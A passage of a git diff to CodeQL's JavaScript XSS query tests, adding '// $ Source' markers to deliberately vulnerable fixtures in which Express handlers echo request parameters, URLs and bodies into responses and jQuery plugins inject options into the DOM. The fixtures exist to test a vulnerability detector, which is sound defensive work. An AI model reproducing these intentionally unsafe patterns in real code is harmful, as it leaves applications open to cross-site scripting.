$('myId').html(error); // $ Alert return; @@ -143,7 +143,7 @@ app.get('/user/:id', function (req, res) { }); (function () { - var foo = document.location.search; + var foo = document.location.search; // $ Source new Promise(resolve => unknown(foo, resolve)).catch((e) => { $('myId').html(e); // $ Alert @@ -177,7 +177,7 @@ app.get('/user/:id', function (req, res) { })(); app.get('/user/:id', function (req, res) { - unknown(req.params.id, (error, res) => { + unknown(req.params.id, (error, res) => { // $ Source if (error) { $('myId').html(error); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js index 667bbe822140..c6be2e55e87e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js @@ -60,7 +60,7 @@ app.get('/user/:id', function (req, res) { .use(doc, { title: '👋🌍' }) .use(format) .use(html) - .process(req.body, function (err, file) { + .process(req.body, function (err, file) { // $ Source res.send(file); // $ Alert }); @@ -70,7 +70,7 @@ app.get('/user/:id', function (req, res) { res.send(unified().use(markdown).processSync(req.body).toString); // $ Alert - remark().process(req.body, (e, f) => { + remark().process(req.body, (e, f) => { // $ Source res.send(f); // $ Alert }) }); @@ -110,9 +110,9 @@ hapi.route({ }}); app.get("invalid/keys/:id", async (req, res) => { - const { keys: queryKeys } = req.query; + const { keys: queryKeys } = req.query; // $ Source const paramKeys = req.params; - const keys = queryKeys || paramKeys?.keys; + const keys = queryKeys || paramKeys?.keys; // $ Source const keyArray = typeof keys === 'string' ? [keys] : keys; const invalidKeys = keyArray.filter(key => !whitelist.includes(key)); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js index 5ab9f9d6f265..996f093aa15c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js @@ -132,7 +132,7 @@ function escapeHtml4(s) { } app.get('/user/:id', function (req, res) { - const url = req.params.id; + const url = req.params.id; // $ Source res.send(escapeHtml1(url)); res.send(escapeHtml2(url)); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js index c7e60092d7ef..8377357a0c4c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js @@ -6,7 +6,7 @@ app.get("/some/path", (req, res) => { let response = "Hello, world!"; if(req.query.jsonp && isVarName(req.query.jsonp)) - response = req.query.jsonp + "(" + response + ")"; + response = req.query.jsonp + "(" + response + ")"; // $ Source res.send(response); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js index 448f12270783..a359780e57b0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js @@ -1,7 +1,7 @@ var express = require('express'); express().get('/user/', function(req, res) { - var evil = req.query.evil; + var evil = req.query.evil; // $ Source res.send(console.log("
    %s
    ", evil)); // OK - returns undefined res.send(util.format("
    %s
    ", evil)); // $ Alert res.send(require("printf")("
    %s
    ", evil)); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js index cd6ca0c9e3da..9e03025792d0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js @@ -1,13 +1,13 @@ var liveServer = require("live-server"); const middleware = [function(req, res, next) { - const tainted = req.url; + const tainted = req.url; // $ Source res.end(`${tainted}`); // $ Alert }]; middleware.push(function(req, res, next) { - const tainted = req.url; + const tainted = req.url; // $ Source res.end(`${tainted}`); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js index 105080e5fba2..a0f2120b2c4f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js @@ -10,7 +10,7 @@ app.get("/some/path", (req, res) => { res.send(x + y); // $ Alert } - let callback = sendResponse.bind(null, req.url); + let callback = sendResponse.bind(null, req.url); // $ Source [1, 2, 3].forEach(callback); }); @@ -19,7 +19,7 @@ app.get("/underscore", (req, res) => { res.send(x + y); // $ Alert } - let callback = underscore.partial(sendResponse, req.url); + let callback = underscore.partial(sendResponse, req.url); // $ Source [1, 2, 3].forEach(callback); }); @@ -28,7 +28,7 @@ app.get("/lodash", (req, res) => { res.send(x + y); // $ Alert } - let callback = lodash.partial(sendResponse, req.url); + let callback = lodash.partial(sendResponse, req.url); // $ Source [1, 2, 3].forEach(callback); }); @@ -37,7 +37,7 @@ app.get("/ramda", (req, res) => { res.send(x + y); // $ Alert } - let callback = R.partial(sendResponse, [req.url]); + let callback = R.partial(sendResponse, [req.url]); // $ Source [1, 2, 3].forEach(callback); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js index 392a1f7ec612..41eb48b68d65 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js @@ -2,7 +2,7 @@ let express = require('express'); let app = express(); app.get("/some/path", (req, res) => { - new Promise((resolve, reject) => resolve(req.query.data)) + new Promise((resolve, reject) => resolve(req.query.data)) // $ Source .then(x => res.send(x)); // $ Alert new Promise((resolve, reject) => resolve(req.query.data)) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js index 35021ea39120..660743338848 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js @@ -3,7 +3,7 @@ var express = require('express'); var app = express(); app.get('/user/:id', function(req, res) { - let { p, q: r } = req.params; + let { p, q: r } = req.params; // $ Source res.send(p); // $ Alert res.send(r); // $ Alert }); @@ -11,7 +11,7 @@ app.get('/user/:id', function(req, res) { const aKnownValue = "foo"; app.get('/bar', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source if (p == aKnownValue) res.send(p); @@ -27,7 +27,7 @@ app.get('/bar', function(req, res) { const clone = require('clone'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; @@ -40,7 +40,7 @@ app.get('/baz', function(req, res) { const serializeJavaScript = require('serialize-javascript'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var serialized = serializeJavaScript(p); @@ -54,7 +54,7 @@ app.get('/baz', function(req, res) { const fclone = require('fclone'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; @@ -66,7 +66,7 @@ app.get('/baz', function(req, res) { const jc = require('json-cycle'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; @@ -79,7 +79,7 @@ app.get('/baz', function(req, res) { const sortKeys = require('sort-keys'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js index 61d153498e74..5419959d61ec 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js @@ -2,12 +2,12 @@ var express = require('express'); var app = express(); app.enable('x-powered-by').disable('x-powered-by').get('/', function (req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source res.send(p); // $ Alert }); const prettier = require("prettier"); app.post("foobar", function (reg, res) { - const code = prettier.format(reg.body, { semi: false, parser: "babel" }); + const code = prettier.format(reg.body, { semi: false, parser: "babel" }); // $ Source res.send(code); // $ Alert }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js index be96d05a400a..0233339ad26e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js @@ -4,7 +4,7 @@ var fs = require('fs'); var express = require('express'); express().get('/', function(req, res) { - fs.readdir("/myDir", function (error, files1) { + fs.readdir("/myDir", function (error, files1) { // $ Source res.send(files1); // $ Alert }); }); @@ -22,7 +22,7 @@ http.createServer(function (req, res) { return files3.join(''); } - fs.readdir("/myDir", function (error, files1) { + fs.readdir("/myDir", function (error, files1) { // $ Source res.write(files1); // $ Alert var dirs = []; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js index 4f712f2604e7..2569f5623d74 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js @@ -3,6 +3,6 @@ const parseTorrent = require('parse-torrent'), express().get('/user/:id', function(req, res) { let torrent = parseTorrent(unknown), - name = torrent.name; + name = torrent.name; // $ Source res.send(name); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js index fb229199e687..40f33d8edb3f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js @@ -8,7 +8,7 @@ $("" + $.trim("foo") + ""); })); -$.fn.myPlugin = function (stuff, options) { +$.fn.myPlugin = function (stuff, options) { // $ Source $("#foo").html("" + options.foo + ""); // $ Alert $("#foo").html("" + stuff + ""); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts index 9c48ed8c23f5..7e546c05d103 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts @@ -1,4 +1,4 @@ -export function trivialXss(s: string) { +export function trivialXss(s: string) { // $ Source const html = "" + s + ""; // $ Alert document.querySelector("#html").innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts index 3ec0e2007396..a69e6e5626d7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts @@ -1,9 +1,9 @@ -export function trivialXss(s: string) { +export function trivialXss(s: string) { // $ Source const html = "" + s + ""; // $ Alert - this file is recognized as a main file. document.querySelector("#html").innerHTML = html; } -export function objectStuff(settings: any, i: number) { +export function objectStuff(settings: any, i: number) { // $ Source document.querySelector("#html").innerHTML = "" + settings + ""; // $ Alert var name; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts index 9566ce8468a8..3c7ac0103431 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts @@ -1,4 +1,4 @@ -export function trivialXss(s: string) { +export function trivialXss(s: string) { // $ Source const html = "" + s + ""; // $ Alert - this file is not recognized as a main file. document.querySelector("#html").innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js index 061a82c862d7..78da04582957 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js @@ -1,14 +1,14 @@ -module.exports.xssThroughHTMLConstruction = function (s) { +module.exports.xssThroughHTMLConstruction = function (s) { // $ Source const html = "" + s + "";// $ Alert document.querySelector("#html").innerHTML = html; } -module.exports.xssThroughXMLParsing = function (s) { +module.exports.xssThroughXMLParsing = function (s) { // $ Source const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert document.querySelector("#xml").appendChild(doc.documentElement); } -module.exports.xssThroughMoreComplexXMLParsing = function (s) { +module.exports.xssThroughMoreComplexXMLParsing = function (s) { // $ Source const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert const xml = doc.documentElement; @@ -18,7 +18,7 @@ module.exports.xssThroughMoreComplexXMLParsing = function (s) { } const markdown = require('markdown-it')({html: true}); -module.exports.xssThroughMarkdown = function (s) { +module.exports.xssThroughMarkdown = function (s) { // $ Source const html = markdown.render(s); // $ Alert document.querySelector("#markdown").innerHTML = html; } @@ -53,7 +53,7 @@ module.exports.createsClass = function (s) { return new Foo(s); } -$.fn.xssPlugin = function (options) { +$.fn.xssPlugin = function (options) { // $ Source const defaults = { name: "name" }; @@ -63,7 +63,7 @@ $.fn.xssPlugin = function (options) { }); } -module.exports.guards = function (attrVal) { +module.exports.guards = function (attrVal) { // $ Source document.querySelector("#id").innerHTML = "\"""; // $ Alert document.querySelector("#id").innerHTML = "\"""; if (attrVal.indexOf("\"") === -1 && attrVal.indexOf("'") === -1) { @@ -76,7 +76,7 @@ module.exports.intentionalTemplate = function (obj) { document.querySelector("#template").innerHTML = html; } -module.exports.types = function (val) { +module.exports.types = function (val) { // $ Source if (typeof val === "string") { $("#foo").html("" + val + ""); // $ Alert } else if (typeof val === "number") { @@ -90,12 +90,12 @@ function createHTML(x) { return "" + x + ""; // $ Alert } -module.exports.usesCreateHTML = function (x) { +module.exports.usesCreateHTML = function (x) { // $ Source $("#foo").html(createHTML(x)); } const myMermaid = require('mermaid'); -module.exports.usesCreateHTML = function (x) { +module.exports.usesCreateHTML = function (x) { // $ Source myMermaid.render("id", x, function (svg) { // $ Alert $("#foo").html(svg); }); @@ -113,7 +113,7 @@ module.exports.usesCreateHTML = function (x) { }); } -module.exports.xssThroughMarkdown = function (s) { +module.exports.xssThroughMarkdown = function (s) { // $ Source const html = markdown.render(s); // $ Alert document.querySelector("#markdown").innerHTML = html; } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts index a00719d74408..1c50460050cf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts @@ -1,9 +1,9 @@ -export function basicHtmlConstruction(s: string) { +export function basicHtmlConstruction(s: string) { // $ Source const html = "" + s + ""; // $ Alert document.body.innerHTML = html; } -export function insertIntoCreatedDocument(s: string) { +export function insertIntoCreatedDocument(s: string) { // $ Source const newDoc = document.implementation.createHTMLDocument(""); newDoc.body.innerHTML = "" + s + ""; // $ SPURIOUS: Alert - inserted into document disconnected from the main DOM. } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js index 896c4f8af210..315644f407df 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js @@ -1,5 +1,5 @@ (function(){ - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source $(options); // $ Alert - or is it? $(options.target); // $ Alert @@ -62,18 +62,18 @@ }; - $.fn.my_plugin = function my_plugin(element, options) { + $.fn.my_plugin = function my_plugin(element, options) { // $ Source this.$element = $(element); this.options = $.extend({}, options); if (this.options.parent) this.$parent = $(this.options.parent) // $ Alert }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source $(options.foo.bar.baz); // $ Alert $(options.html); }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source $(x).appendTo(options.foo.bar.baz); // $ Alert }; @@ -81,7 +81,7 @@ $("#" + options.target); }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source function f(o) { this.o = $.extend({}, o); var t = this.o.target; @@ -98,7 +98,7 @@ $(target); }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source options = $.extend({ menu: '
    ', target: '.my_plugin' @@ -111,28 +111,28 @@ menu: '
    ', target: '.my_plugin' }; - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source options = $.extend({}, $.fn.my_plugin.defaults, options); $(options.menu); $(options.target); // $ Alert }; var pluginName = "my_plugin"; - $.fn[pluginName] = function my_plugin(options) { + $.fn[pluginName] = function my_plugin(options) { // $ Source $(options.target); // $ Alert }; $.extend($.fn, { - my_plugin: function my_plugin(options) { + my_plugin: function my_plugin(options) { // $ Source $(options.target); // $ Alert } }); - $.fn.affix = function my_plugin(options) { + $.fn.affix = function my_plugin(options) { // $ Source $(options.target); // $ Alert }; - $.fn.tooltip = function my_plugin(options) { + $.fn.tooltip = function my_plugin(options) { // $ Source $(options.viewport.selector); // $ Alert }; @@ -150,14 +150,14 @@ $(unintentional); // OK - but should be flagged by another query } - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source let target = options.target; target === DEFAULTS.target? $(target): $(document).find(target); options.target === DEFAULTS.target? $(options.target): $(document).find(options.target); options.targets.a === DEFAULTS.target? $(options.target.a): $(document).find(options.target.a); // $ SPURIOUS: Alert - should be sanitized by `MembershipTestSanitizer` - but still flagged because `AccessPath` can't handle these deeply nested properties } - $.fn.my_plugin = function my_plugin(options) { + $.fn.my_plugin = function my_plugin(options) { // $ Source $(anyPrefix + options.target); // OK - unlikely to be a html/css prefix confusion $(something.replace("%PLACEHOLDER%", options.target)); // OK - (unlikely to be a html/css prefix confusion); @@ -175,14 +175,14 @@ function setupPlugin(o) { $.fn.my_plugin = o.f } - setupPlugin({f: function(options) { + setupPlugin({f: function(options) { // $ Source $(options.target); // $ Alert }}); setupPlugin({f:function(options) { $(document).find(options.target); }}); - $.fn.position = function( options ) { + $.fn.position = function( options ) { // $ Source if ( !options || !options.of ) { return doSomethingElse( this, arguments ); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts index e9ca1f400890..084950e8e08e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts @@ -9,7 +9,7 @@ import { NgForm } from "@angular/forms"; ` }) export class Foo { - field: string = ""; + field: string = ""; // $ Source safeField: string = ""; setInput1(event) { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js index c78fc9284a15..e57ef84dc429 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js @@ -5,10 +5,10 @@ const FormikBasic = () => (
    { + validate={values => { // $ Source $("#id").html(values.foo); // $ Alert }} - onSubmit={(values, { setSubmitting }) => { + onSubmit={(values, { setSubmitting }) => { // $ Source $("#id").html(values.bar); // $ Alert }} > @@ -21,17 +21,17 @@ const FormikBasic = () => ( const FormikEnhanced = withFormik({ mapPropsToValues: () => ({ name: '' }), - validate: values => { + validate: values => { // $ Source $("#id").html(values.email); // $ Alert }, - handleSubmit: (values, { setSubmitting }) => { + handleSubmit: (values, { setSubmitting }) => { // $ Source $("#id").html(values.email); // $ Alert } })(MyForm); (function () { - const { values, submitForm } = useFormikContext(); + const { values, submitForm } = useFormikContext(); // $ Source $("#id").html(values.email); // $ Alert $("#id").html(submitForm.email); @@ -41,7 +41,7 @@ import { Form } from 'react-final-form' const App = () => (
    { + onSubmit={async values => { // $ Source $("#id").html(values.stooge); // $ Alert }} initialValues={{ stooge: 'larry', employed: false }} @@ -68,7 +68,7 @@ import { useForm } from 'react-hook-form'; function HookForm() { const { register, handleSubmit, errors } = useForm(); // initialize the hook - const onSubmit = (data) => { + const onSubmit = (data) => { // $ Source $("#id").html(data.name); // $ Alert }; @@ -89,7 +89,7 @@ function HookForm2() {